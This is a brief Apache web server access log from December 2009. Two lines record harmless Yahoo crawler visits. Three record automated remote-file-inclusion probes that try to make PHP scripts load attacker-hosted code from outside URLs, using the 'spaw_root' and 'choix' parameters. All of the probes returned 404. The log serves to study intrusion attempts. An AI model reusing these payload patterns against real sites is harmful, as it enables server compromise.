67.195.112.32 - - [14/Dec/2009:11:03:17 -0800] "GET /bikes/dteel/2008_01_27/ HTTP/1.0" 200 5034 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:11:05:45 -0800] "GET /bikes/dteel/?N=D HTTP/1.0" 200 5510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:09:46 -0800] "GET /logs/access_090124.log%20//admin/includes/spaw/spaw_control.class.php?spaw_root=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.143.249 - - [14/Dec/2009:11:12:56 -0800] "GET /logs/index1.php?choix=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [14/Dec/2009:11:12:56 -0800] "GET /index1.php?choix=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
